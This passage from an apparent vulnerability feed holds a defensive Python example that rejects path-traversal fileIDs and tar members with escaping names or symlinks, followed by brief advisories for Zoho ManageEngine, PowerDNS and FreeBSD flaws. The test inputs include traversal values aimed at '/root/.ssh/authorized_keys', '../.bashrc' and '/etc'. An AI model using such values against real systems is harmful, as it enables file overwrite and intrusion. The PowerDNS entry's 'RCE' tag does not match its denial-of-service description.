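The MVT entry above and the Boxlite layer-extraction entry earlier are the same containment problem seen from two sides: a relative name from an untrusted manifest that must stay under the output root, and an archive entry whose name or symlink target would escape the extraction root. The added example below serves both; it is not either project's code, the backup root is an assumed path, and the sample layer tarball is constructed in memory.

```python
"""Containment checks for untrusted relative paths (MVT-style fileID values) and for
tar/OCI layer members whose names or link targets escape the extraction root.
Added example, not either project's code; root path and sample layer are constructed."""
import io
import os
import posixpath
import tarfile


def resolve_under_root(root: str, untrusted: str) -> str:
    """Join an untrusted relative path onto root and prove the result stays inside it."""
    if untrusted.startswith(("/", "\\")) or "\\" in untrusted or "\x00" in untrusted:
        raise ValueError(f"rejecting {untrusted!r}: absolute path or non-POSIX separator")
    root = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root, untrusted))  # collapses '..' and symlinks
    if os.path.commonpath([root, candidate]) != root:
        raise ValueError(f"rejecting {untrusted!r}: escapes {root}")
    return candidate


def vet_file_ids(root: str, file_ids) -> dict:
    """Map each fileID to True (safe to read/write under root) or False."""
    verdicts = {}
    for fid in file_ids:
        try:
            resolve_under_root(root, fid)
            verdicts[fid] = True
        except ValueError:
            verdicts[fid] = False
    return verdicts


def _escapes(rel: str) -> bool:
    """Lexical test on a POSIX path taken relative to the extraction root."""
    rel = posixpath.normpath(rel)
    return rel.startswith("/") or rel == ".." or rel.startswith("../")


def unsafe_tar_members(tar: tarfile.TarFile) -> list:
    """Names of members that would write, or point, outside the extraction root."""
    bad = []
    for m in tar.getmembers():
        if _escapes(m.name):
            bad.append(m.name)
        elif m.issym():
            # A symlink target is relative to the link's own directory unless absolute.
            target = m.linkname if m.linkname.startswith("/") else posixpath.join(
                posixpath.dirname(m.name), m.linkname)
            if _escapes(target):
                bad.append(m.name)
        elif m.islnk() and _escapes(m.linkname):  # hard-link targets are archive-relative
            bad.append(m.name)
    return bad


def build_sample_layer() -> tarfile.TarFile:
    """Constructed layer: one honest file, one symlink out of the root, one traversal name."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tw:
        payload = b'{"ok": true}\n'
        info = tarfile.TarInfo("app/config.json")
        info.size = len(payload)
        tw.addfile(info, io.BytesIO(payload))
        link = tarfile.TarInfo("app/etc")
        link.type = tarfile.SYMTYPE
        link.linkname = "../../../etc"  # resolves to ../../etc relative to the root
        tw.addfile(link)
        tw.addfile(tarfile.TarInfo("../.bashrc"))
    buf.seek(0)
    return tarfile.open(fileobj=buf, mode="r")


if __name__ == "__main__":
    print(vet_file_ids("/var/mvt/backup-out", ["Library/SMS/sms.db", "../../../root/.ssh/authorized_keys"]))
    print(unsafe_tar_members(build_sample_layer()))
```

The lexical symlink check holds only if members are vetted in archive order into a destination that contains no pre-existing symlinks; a link that points inside the root at vetting time can still be abused if something later replaces its target. For the tar half, Python 3.12's `TarFile.extractall(..., filter="data")` (also backported to the 3.8 to 3.11 maintenance lines) enforces the same class of rules, so the hand-rolled check above is mainly useful when the extraction code is not Python's tarfile.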
EPSS 1% CVSS 8.4
HIGH PATCH This Week

Authenticated remote code execution affects Zoho ManageEngine ADSelfService Plus (before build 6525), DataSecurity Plus (before 6264), and RecoveryManager Plus (before 6313) on agent machines, stemming from a flaw in a bundled third-party dependency. An authenticated attacker with low privileges can inject commands (CWE-77) to execute arbitrary code on managed agent endpoints, with no public exploit identified at time of analysis.

RCE Command Injection Zoho
NVD VulDB
EPSS 0% CVSS 4.9
MEDIUM PATCH This Month

Catalog zone transfer failure in PowerDNS Authoritative can be triggered by a high-privileged remote attacker who injects insufficiently validated member zone data, causing the catalog zone transfer mechanism to abort and preventing secondary nameservers from receiving zone updates. The impact is a targeted denial-of-service against DNS zone replication infrastructure, affecting any deployment using catalog zones (RFC 9432). No public exploit has been identified at time of analysis, and the vulnerability is not listed in CISA KEV.

RCE Code Injection
NVD VulDB
EPSS 0% CVSS 8.4
HIGH This Week

Local privilege escalation in FreeBSD via the ptrace(PT_SC_REMOTE) interface allows an unprivileged user with debug access to a process to trigger arbitrary kernel code execution by abusing improperly validated parameters in syscall(2) and __syscall(2) meta-system calls. Affected releases include FreeBSD 14.3, 14.4, and 15.0 prior to their respective patch levels, and no public exploit identified at time of analysis. EPSS exploitation probability is low (0.02%) but the CVSS base score of 8.4 reflects high impact across confidentiality, integrity, and availability once a foothold exists.

RCE Buffer Overflow Memory Corruption
NVD VulDB